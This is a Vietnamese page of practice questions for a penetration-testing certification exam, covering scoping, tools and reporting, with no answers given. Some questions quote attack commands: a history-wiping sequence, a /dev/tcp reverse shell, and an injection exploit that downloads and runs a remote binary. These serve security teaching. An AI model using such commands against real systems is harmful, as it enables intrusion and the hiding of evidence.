Câu 1: Lệnh nào sau đây cho phép một penetration tester cho chủ sở hữu file thực thi một shell script?
A. chmod u+x script.sh
B. chmod u+e script.sh
C. chmod o+e script.sh
D. chmod o+x script.sh

Câu 2: Một penetration tester truy cập vào hệ thống và thiết lập persistence, sau đó chạy các lệnh sau:

      cat /dev/null > temp
touch -r .bash_history temp
mv temp .bash_history
    

Tester NÀY có nhiều khả năng thực hiện hành động nào sau đây?
A. Chuyển hướng lịch sử Bash sang /dev/null
B. Sao chép lịch sử Bash của người dùng để phân tích thêm
C. Xóa dấu vết bằng cách xóa lịch sử Bash
D. Tạo các file giả mạo trên hệ thống để gây nhầm lẫn cho những người phản ứng sự cố

Câu 3: Một penetration test dựa trên tuân thủ chủ yếu liên quan đến:
A. lấy PII từ mạng được bảo vệ.
B. bỏ qua bảo vệ trên các thiết bị biên.
C. xác định hiệu quả của một tập hợp các tiêu chuẩn bảo mật cụ thể.
D. lấy thông tin cụ thể từ mạng được bảo vệ.

Câu 4: Một penetration tester đang giải thích framework MITRE ATT&CK cho cố vấn pháp lý của công ty.
Tester NÀY có nhiều khả năng mô tả lợi ích nào sau đây của framework?
A. Hiểu các chiến thuật xâm nhập bảo mật có thể giúp ngăn chặn chúng.
B. Các script là một phần của framework có thể được nhập trực tiếp vào các công cụ SIEM.
C. Phương pháp luận có thể được sử dụng để ước tính chi phí của một sự cố tốt hơn.
D. Framework là tĩnh và đảm bảo tính ổn định của chương trình bảo mật theo thời gian.

Câu 5: Hai câu nào sau đây mô tả ĐÚNG NHẤT OWASP Top 10? (Chọn hai)
A. Các rủi ro nghiêm trọng nhất của ứng dụng web
B. Danh sách tất cả các rủi ro của ứng dụng web
C. Các rủi ro được xác định theo thứ tự mức độ quan trọng
D. Tiêu chuẩn bảo mật ứng dụng web
E. Framework quản trị và tuân thủ rủi ro
F. Danh sách kiểm tra các lỗ hổng Apache

Câu 6: Một penetration tester đã phát hiện ra một lỗ hổng cho phép tải lên một đường dẫn thông qua việc duyệt thư mục. Một số tệp được phát hiện thông qua lỗ hổng này là:

      https://xx.xx.xx.x/vpn/../vpns/portal/scripts/newbm.pl
https://xx.xx.xx.x/vpn/../vpns/portal/scripts/rmbm.pl
https://xx.xx.xx.x/vpn/../vpns/portal/scripts/picktheme.pl
https://xx.xx.xx.x/vpn/../vpns/cfg/smb.conf
    

Phương pháp nào sau đây là TỐT NHẤT để giúp kẻ tấn công truy cập nội bộ vào máy bị ảnh hưởng?
A. Chỉnh sửa file đã phát hiện với một dòng mã để gọi lại từ xa.
B. Tải xuống các file .pl và tìm kiếm tên người dùng và mật khẩu.
C. Chỉnh sửa file smb.conf và tải nó lên máy chủ.
D. Tải xuống file smb.conf và xem cấu hình.

Câu 7: Một công ty đã được phép quét lỗ hổng từ nhà cung cấp dịch vụ đám mây và hiện muốn kiểm tra bảo mật của dữ liệu được lưu trữ.
Tester nên xác minh ĐẦU TIÊN điều gì sau đây để đánh giá rủi ro này?
A. Liệu dữ liệu khách hàng nhạy cảm có thể truy cập công khai hay không
B. Liệu kết nối giữa đám mây và khách hàng có an toàn hay không
C. Liệu nhân viên của khách hàng có được đào tạo đúng cách để sử dụng nền tảng hay không
D. Liệu các ứng dụng đám mây có được phát triển bằng cách sử dụng SDLC an toàn hay không

Câu 8: Một penetration tester đã chạy lệnh sau trên một máy chủ staging: python -m SimpleHTTPServer 9891
Lệnh nào sau đây có thể được sử dụng để tải xuống một file có tên exploit vào máy mục tiêu để thực thi?
A. nc 10.10.51.50 9891 < exploit
B. powershell -exec bypass -f \\10.10.51.50\9891
C. bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit
D. wget 10.10.51.50:9891/exploit

Câu 9: Một penetration tester đã có thể truy cập vào hệ thống bằng cách sử dụng một exploit. Dưới đây là một đoạn mã đã được sử dụng:

      exploit += "POST"
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${sytem.IFS()}-c${system.IFS()}'cd${system.IFS()}/tmp;${system.IFS()}wget${system.IFS()}http://10.10.0.1/apache;${system.IFS()}chmod${system.IFS()}777${system.IFS()}apache${system.IFS())./apache'%0A%27&loginUSer=a&Pwd=a"
exploit += "HTTP/1.1"
    

Lệnh nào sau đây penetration tester nên chạy sau khi tham gia?
A. grep -v apache ~/bash_history > ~/.bash_history
B. rm -rf /tmp/apache
C. chmod 600 /tmp/apache
D. taskkill /IM “apache” /F

Câu 10: Điều nào sau đây là QUAN TRỌNG NHẤT cần đưa vào báo cáo cuối cùng của bài kiểm tra bảo mật ứng dụng tĩnh được viết với một nhóm các nhà phát triển ứng dụng là đối tượng dự định?
A. Tóm tắt điều hành các phương pháp kiểm tra thâm nhập đã sử dụng
B. Danh sách vật liệu bao gồm vật tư, hợp đồng phụ và chi phí phát sinh trong quá trình đánh giá
C. Đánh giá tác động định lượng nếu phần mềm bị xâm nhập thành công
D. Bối cảnh mã cho các trường hợp hoạt động ép kiểu không an toàn

Câu 11: (SIMULATION – Mô phỏng)
Bạn là một penetration tester đang xem xét trang web của khách hàng thông qua trình duyệt web.

HƯỚNG DẪN –
Xem xét tất cả các thành phần của trang web thông qua trình duyệt để xác định xem có lỗ hổng nào hay không.
Chỉ khắc phục lỗ hổng CAO NHẤT từ chứng chỉ, nguồn hoặc cookie.
Nếu bất kỳ lúc nào bạn muốn khôi phục lại trạng thái ban đầu của mô phỏng, vui lòng nhấp vào nút Đặt lại Tất cả.

(Câu hỏi này yêu cầu tương tác với một môi trường mô phỏng, không thể dịch đầy đủ nếu không có môi trường đó.)

Câu 12: Một Giám đốc An ninh Thông tin muốn một penetration tester đánh giá mức độ nhận thức bảo mật của nhân viên công ty. Công cụ nào sau đây có thể giúp tester đạt được mục tiêu này?
A. Metasploit
B. Hydra
C. SET
D. WPScan

Câu 13: Lỗ hổng phổ biến NHẤT liên quan đến các thiết bị IoT được kết nối trực tiếp với Internet là gì?
A. Hệ điều hành không được hỗ trợ
B. Dễ bị tấn công DDoS
C. Không có khả năng kết nối mạng
D. Sự tồn tại của mật khẩu mặc định

Câu 14: Điều nào sau đây mô tả lý do tại sao một penetration tester sẽ chạy lệnh sdelete mimikatz.* trên máy chủ Windows mà tester đã xâm nhập?
A. Để xóa các mục đăng ký bẻ khóa hash
B. Để xóa tài khoản Mimikatz do tester tạo
C. Để xóa các công cụ khỏi máy chủ
D. Để xóa shell ngược khỏi hệ thống

Câu 15: Một penetration tester đang quét mạng lab của công ty để tìm các dịch vụ có khả năng dễ bị tấn công. Lệnh Nmap nào sau đây sẽ trả về các cổng dễ bị tấn công mà kẻ tấn công có thể quan tâm?
A. nmap 192.168.1.1-5 -PU22-25,80
B. nmap 192.168.1.1-5 -PA22-25,80
C. nmap 192.168.1.1-5 -PS22-25,80
D. nmap 192.168.1.1-5 -Ss22-25,80

Câu 16: Một penetration tester đang brute-force một máy chủ web nội bộ và chạy một lệnh tạo ra kết quả sau: (đoạn output của lệnh dirb)
Tuy nhiên, khi penetration tester cố gắng duyệt URL http://172.16.100.10:3000/profile, một trang trống được hiển thị. Nguyên nhân NÀO có nhiều khả năng NHẤT cho việc thiếu kết quả?
A. Cổng HTTP không được mở trên tường lửa.
B. Tester đã không chạy sudo trước lệnh.
C. Máy chủ web đang sử dụng HTTPS thay vì HTTP.
D. URI này đã trả về lỗi máy chủ.

Câu 17: Một penetration tester đang tiến hành kiểm tra thâm nhập và phát hiện ra rằng lưu lượng mạng không còn đến địa chỉ IP của khách hàng. Tester sau đó phát hiện ra rằng SOC đã sử dụng sinkholing trên địa chỉ IP của penetration tester.
Điều nào sau đây có nhiều khả năng NHẤT mô tả những gì đã xảy ra?
A. Penetration tester đã kiểm tra nhầm tài sản.
B. Quá trình lập kế hoạch không đảm bảo tất cả các nhóm được thông báo.
C. Khách hàng chưa sẵn sàng cho việc đánh giá bắt đầu.
D. Penetration tester có thông tin liên hệ không chính xác.

Câu 18: Quét Nmap hiển thị các cổng mở trên máy chủ web và cơ sở dữ liệu. Penetration tester quyết định chạy WPScan và SQLmap để xác định lỗ hổng và thông tin bổ sung về các hệ thống đó.
Penetration tester đang cố gắng thực hiện điều gì sau đây?
A. Khám phá hoạt động tội phạm tiềm ẩn dựa trên bằng chứng thu thập được.
B. Xác định tất cả các lỗ hổng trong môi trường.
C. Hạn chế xâm nhập dựa trên phạm vi.
D. Duy trì tính bảo mật của các phát hiện.

Câu 19: Một công ty đã thuê một penetration tester để thực hiện kiểm tra social engineering đối với nhân viên của mình. Mặc dù tester không tìm thấy số điện thoại của bất kỳ nhân viên nào trên trang web của công ty, nhưng tester đã biết được danh bạ điện thoại hoàn chỉnh đã được xuất bản ở đó vài tháng trước.
Tester nên tìm số điện thoại của nhân viên ở đâu ĐẦU TIÊN?
A. Lưu trữ web
B. GitHub
C. Siêu dữ liệu tệp
D. Diễn đàn ngầm

Câu 20: Một penetration tester muốn xác định các CVE có thể được tận dụng để thực thi trên máy chủ Linux đang chạy SSHD.
Điều nào sau đây sẽ hỗ trợ TỐT NHẤT cho nhiệm vụ này?
A. Chạy nmap với các tùy chọn -O, -p22 và -sC được đặt trên mục tiêu.
B. Chạy nmap với các tùy chọn -sV và -p22 được đặt trên mục tiêu.
C. Chạy nmap với tùy chọn –script vulners được đặt trên mục tiêu.
D. Chạy nmap với tùy chọn -sA được đặt trên mục tiêu.

Câu 21: Một penetration tester đã hoàn thành quét lỗ hổng trên một máy chủ web và xác định được một lỗ hổng duy nhất nhưng nghiêm trọng.
Cách nào sau đây là TỐT NHẤT để đảm bảo đây là một dương tính thật?
A. Chạy một trình quét khác để so sánh.
B. Thực hiện kiểm tra thủ công trên máy chủ.
C. Kiểm tra kết quả trên trình quét.
D. Tìm kiếm lỗ hổng trực tuyến.

Câu 22: Một penetration tester được cho 8 giờ làm việc để truy cập vào hệ thống tài chính của khách hàng.
Kỹ thuật nào sau đây có KHẢ NĂNG thành công CAO NHẤT?
A. Cố gắng bám đuôi một nhân viên đang đi vào nơi làm việc của khách hàng
B. Thả một USB độc hại có logo của công ty trong bãi đậu xe
C. Sử dụng tấn công brute-force vào vành đai bên ngoài để có được chỗ đứng
D. Thực hiện spear phishing nhắm vào nhân viên bằng cách giả làm quản lý cấp cao

Câu 23: Giám đốc điều hành của một công ty đã tạo một văn phòng tại nhà thứ hai và lo ngại rằng dịch vụ WiFi đang sử dụng dễ bị tấn công. Một penetration tester được thuê để kiểm tra bảo mật của bộ định tuyến WiFi.
Điều nào sau đây là DỄ BỊ TẤN CÔNG brute-force NHẤT?
A. WPS
B. WPA2-EAP
C. WPA-TKIP
D. WPA2-PSK

Câu 24: Một penetration tester viết script sau:

      #!/bin/bash
for x in 'seq 1 254'; do
  ping -c 1 10.10.1.$x;
done
    

Mục tiêu nào sau đây mà tester đang cố gắng đạt được?
A. Xác định các máy chủ hoạt động trên mạng.
B. Đặt TTL của các gói ping để ẩn danh.
C. Điền vào bảng ARP của các thiết bị được kết nối mạng.
D. Quét hệ thống trên các cổng được sử dụng nhiều nhất.

Câu 25: Một penetration tester đã chạy các lệnh sau trên máy chủ Windows: (đoạn lệnh powershell)
Tester nên làm gì SAU KHI gửi báo cáo cuối cùng?
A. Xóa tác vụ batch đã lên lịch.
B. Đóng kết nối shell ngược.
C. Hạ cấp quyền của svsaccount.
D. Xóa thông tin đăng nhập do tester tạo.

Câu 26: Một penetration tester đã thiết lập vị trí tấn công trên đường dẫn và bây giờ phải tạo một phản hồi truy vấn DNS đặc biệt để gửi lại cho máy chủ đích.
Tiện ích nào sau đây sẽ hỗ trợ TỐT NHẤT mục tiêu này?
A. Socat
B. tcpdump
C. Scapy
D. dig

Câu 27: Một penetration tester đang bắt đầu đánh giá nhưng chỉ có thông tin công khai về công ty mục tiêu. Khách hàng biết về bài tập này và đang chuẩn bị cho bài kiểm tra.
Điều nào sau đây mô tả phạm vi của đánh giá?
A. Kiểm tra môi trường được biết một phần
B. Kiểm tra môi trường đã biết
C. Kiểm tra môi trường chưa biết
D. Kiểm tra môi trường vật lý

Câu 28: Đoạn mã Python được đánh số dòng sau đây đang được sử dụng trong quá trình trinh sát: (đoạn mã python)
Số dòng nào sau đây từ script NÀO có nhiều khả năng NHẤT góp phần vào việc script kích hoạt cảnh báo ‘có thể quét cổng’ trong IDS của tổ chức?
A. Dòng 01
B. Dòng 02
C. Dòng 07
D. Dòng 08
E. Dòng 12

Câu 29: Một công ty tư vấn đang hoàn thành ROE trong quá trình xác định phạm vi.
Điều nào sau đây nên được bao gồm trong ROE?
A. Chi phí đánh giá
B. Phân phối báo cáo
C. Hạn chế kiểm tra
D. Trách nhiệm pháp lý

Câu 30: Một khách hàng mới đã thuê một công ty kiểm tra thâm nhập theo hợp đồng kéo dài một tháng cho các đánh giá bảo mật khác nhau đối với dịch vụ mới của khách hàng. Khách hàng dự kiến sẽ cung cấp dịch vụ mới ra công chúng ngay sau khi đánh giá hoàn tất và đang có kế hoạch khắc phục mọi phát hiện, ngoại trừ các vấn đề nghiêm trọng, sau khi dịch vụ được công khai. Khách hàng muốn có cấu trúc báo cáo đơn giản và không muốn nhận kết quả hàng ngày.
Điều nào sau đây là QUAN TRỌNG nhất để penetration tester xác định ĐẦU TIÊN?
A. Thiết lập định dạng do khách hàng yêu cầu.
B. Thiết lập ngưỡng rủi ro để leo thang ngay lập tức cho khách hàng.
C. Thiết lập phương pháp xử lý dương tính giả.
D. Thiết lập ngày ưa thích trong tuần để báo cáo.

Câu 31: Một penetration tester đăng nhập với tư cách người dùng trong môi trường đám mây của công ty. Module Pacu nào sau đây sẽ cho phép tester xác định mức độ truy cập của người dùng hiện tại?
A. iam_enum_permissions
B. iam_prive_sc_scan
C. iam_backdoor_assume_role
D. iam_bruteforce_permissions

Câu 32: Một công ty lo ngại khi chuông báo động bảo mật được kích hoạt trong quá trình kiểm tra thâm nhập. Công ty nên làm gì TIẾP THEO?
A. Dừng kiểm tra thâm nhập.
B. Tiến hành ứng phó sự cố.
C. Giải quyết mâu thuẫn với penetration tester.
D. Giả định cảnh báo là từ kiểm tra thâm nhập.

Câu 33: Một penetration tester được thuê để thực hiện kiểm tra thâm nhập vật lý để có quyền truy cập vào một căn phòng an toàn trong tòa nhà của khách hàng. Trinh sát bên ngoài xác định hai lối vào, mạng WiFi dành cho khách, và nhiều camera an ninh được kết nối Internet.
Công cụ hoặc kỹ thuật nào sau đây sẽ hỗ trợ TỐT NHẤT cho việc trinh sát bổ sung?
A. Wardriving
B. Shodan
C. Recon-ng
D. Aircrack-ng

Câu 34: Một nhóm red team đã truy cập vào mạng nội bộ của khách hàng trong một cuộc giao tranh và sử dụng công cụ Responder để nắm bắt dữ liệu quan trọng.
Điều nào sau đây đã được nhóm kiểm tra nắm bắt?
A. Nhiều handshake
B. Địa chỉ IP
C. Truyền tệp được mã hóa
D. Hash người dùng được gửi qua SMB

Câu 35: Penetration tester thực hiện quét Nmap trên một mục tiêu và nhận được kết quả sau:

      Port     State   Service
1080/tcp open   socks
    

Tester nên sử dụng cái nào sau đây để chuyển hướng các công cụ quét bằng cổng TCP 1080 trên mục tiêu?
A. Nessus
B. ProxyChains
C. OWASP ZAP
D. Empire

Câu 36: Một penetration tester đang thực hiện đánh giá bảo mật phát hiện ra rằng một lỗ hổng nghiêm trọng đang bị tội phạm mạng khai thác tích cực.
Tester nên làm gì TIẾP THEO?
A. Liên hệ với điểm liên hệ chính.
B. Cố gắng hạ gục những kẻ tấn công.
C. Gọi ngay cho cơ quan thực thi pháp luật.
D. Thu thập bằng chứng thích hợp và thêm vào báo cáo cuối cùng.

Câu 37: Một penetration tester nhận được tệp .pcap để tìm thông tin đăng nhập để sử dụng trong một cuộc giao tranh. Tester nên sử dụng công cụ nào sau đây để mở và đọc tệp .pcap?
A. Nmap
B. Wireshark
C. Metasploit
D. Netcat

Câu 38: Một penetration tester đã chạy quét Nmap trên một thiết bị mạng hướng Internet với tùy chọn -F và tìm thấy một vài cổng mở. Để liệt kê thêm, tester đã chạy một lần quét khác bằng lệnh sau: nmap -O -A -sS -p- 100.100.100.50.
Nmap trả về rằng tất cả 65.535 cổng đã bị lọc. Điều nào sau đây có nhiều khả năng NHẤT xảy ra trong lần quét thứ hai?
A. Tường lửa hoặc IPS đã chặn quét.
B. Penetration tester đã sử dụng các cờ không được hỗ trợ.
C. Thiết bị mạng biên đã bị ngắt kết nối.
D. Quét đã trả về các phản hồi ICMP echo.

Câu 39: Một Penetration tester đang tìm kiếm lỗ hổng cho phép kẻ tấn công mở cửa thông qua dịch vụ TCP chuyên dụng được sử dụng cho hệ thống kiểm soát truy cập vật lý. Dịch vụ tồn tại trên hơn 100 máy chủ khác nhau, vì vậy tester muốn tự động hóa đánh giá. Việc xác định yêu cầu penetration tester phải:

  • Có kết nối TCP đầy đủ
  • Gửi payload ‘hello’
  • Đợi phản hồi
  • Gửi một chuỗi ký tự dài hơn 16 byte
    Phương pháp nào sau đây sẽ hỗ trợ TỐT NHẤT cho mục tiêu?
    A. Chạy nmap -Pn -sV –script vuln <IP address>.
    B. Sử dụng quét OpenVAS đơn giản trên cổng TCP của máy chủ.
    C. Tạo một script bằng ngôn ngữ Lua và sử dụng nó với NSE.
    D. Thực hiện quét có chứng chỉ với Nessus.

Câu 40: Thực hiện kiểm tra thâm nhập đối với môi trường có các thiết bị SCADA mang lại rủi ro an toàn bổ sung vì:
A. các thiết bị tạo ra nhiều nhiệt hơn và tiêu thụ nhiều năng lượng hơn.
B. các thiết bị đã lỗi thời và không còn khả dụng để thay thế.
C. các giao thức khó hiểu hơn.
D. các thiết bị có thể gây ra các tác động đến thế giới vật lý.

Câu 41: Một penetration tester được giao nhiệm vụ tấn công một loạt mục tiêu trong dải 192.168.1.0/24, kích hoạt càng ít báo động và biện pháp đối phó càng tốt. Cú pháp quét Nmap nào sau đây sẽ đạt được mục tiêu này TỐT NHẤT?
A. nmap -sT -vvv -O 192.168.1.2/24 -PO
B. nmap -sV 192.168.1.2/24 -PO
C. nmap -sA -v -O 192.168.1.2/24
D. nmap -sS -O 192.168.1.2/24 -T1

Câu 42: Một penetration tester đã truy cập vào một thiết bị mạng có dải IP chưa biết trước đó trên một giao diện. Nghiên cứu sâu hơn xác định đây là một đường hầm VPN luôn bật đến một nhà cung cấp bên thứ ba.
Hành động TỐT NHẤT mà penetration tester nên thực hiện là gì?
A. Sử dụng đường hầm như một phương tiện để xoay vòng sang các thiết bị nội bộ khác.
B. Bỏ qua dải IP, vì nó nằm ngoài phạm vi.
C. Dừng đánh giá và thông báo cho người liên hệ khẩn cấp.
D. Quét dải IP để tìm các hệ thống bổ sung để khai thác.

Câu 43: Một penetration tester gần đây đã thực hiện một cuộc tấn công social engineering, trong đó tester đã tìm thấy một nhân viên của công ty mục tiêu tại một quán cà phê địa phương và theo thời gian đã xây dựng mối quan hệ với nhân viên đó. Vào sinh nhật của nhân viên, tester đã tặng nhân viên một ổ cứng gắn ngoài làm quà.
Penetration tester đã sử dụng cuộc tấn công social engineering nào sau đây?
A. Phishing
B. Tailgating
C. Baiting
D. Shoulder surfing

Câu 44: Một công ty bảo mật đã được ký hợp đồng để thực hiện đánh giá mối đe dọa nội bộ theo phạm vi để cố gắng truy cập vào máy chủ nhân sự chứa dữ liệu PII và lương. Penetration tester đã được cấp một vị trí bắt đầu mạng nội bộ.
Hành động nào sau đây, nếu được thực hiện, sẽ được coi là đạo đức trong phạm vi đánh giá?
A. Khai thác điểm yếu cấu hình trong cơ sở dữ liệu SQL
B. Chặn lưu lượng TLS gửi đi
C. Truy cập vào máy chủ bằng cách tiêm phần mềm độc hại vào máy chủ cập nhật toàn doanh nghiệp
D. Tận dụng lỗ hổng trên CA nội bộ để cấp chứng chỉ khách hàng gian lận
E. Thiết lập và duy trì persistence trên bộ điều khiển miền

Câu 45: Một penetration tester có thể bắt được lưu lượng phản hồi thử thách NTLM giữa máy khách và máy chủ.
Điều nào sau đây có thể được thực hiện với pcap để truy cập vào máy chủ?
A. Thực hiện leo thang đặc quyền dọc.
B. Phát lại lưu lượng đã bắt được đến máy chủ để tạo lại phiên.
C. Sử dụng John the Ripper để bẻ khóa mật khẩu.
D. Sử dụng tấn công pass-the-hash.

Câu 46: Tài liệu nào sau đây mô tả các hoạt động, sản phẩm phân phối và lịch trình cụ thể cho penetration tester?
A. NDA
B. MSA
C. SOW
D. MOU

Câu 47: Penetration tester đang khám phá trang web của khách hàng. Tester thực hiện lệnh curl và nhận được như sau: (output của lệnh curl)
Công cụ nào sau đây là TỐT NHẤT để penetration tester sử dụng để khám phá trang web này thêm?
A. Burp Suite
B. DirBuster
C. WPScan
D. OWASP ZAP

Câu 48: (DRAG DROP – Kéo thả)
Trong quá trình kiểm tra thâm nhập, bạn có quyền truy cập vào một hệ thống có giao diện người dùng hạn chế. Máy này dường như có quyền truy cập vào một mạng bị cô lập mà bạn muốn quét cổng.

HƯỚNG DẪN –
Phân tích các đoạn mã để xác định phần nào cần thiết để hoàn thành script quét cổng.
Kéo các phần tử thích hợp vào đúng vị trí để hoàn thành script.
Nếu bất kỳ lúc nào bạn muốn khôi phục trạng thái ban đầu của mô phỏng, vui lòng nhấp vào nút Đặt lại Tất cả.

(Câu hỏi này yêu cầu tương tác với một môi trường mô phỏng, không thể dịch đầy đủ nếu không có môi trường đó.)

Câu 49: (Cũng là câu hỏi DRAG DROP – Kéo thả) Tương tự câu 48, yêu cầu tương tác với môi trường mô phỏng.

Câu 50: Khi phát triển một script shell dành cho trình thông dịch trong Bash, trình thông dịch /bin/bash nên được chỉ định rõ ràng.
Tổ hợp ký tự nào sau đây nên được sử dụng trên dòng đầu tiên của script để đạt được mục tiêu này?
A. #
B. $$
C. ##
D. #$
E. #!

Để lại một bình luận

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *

Trending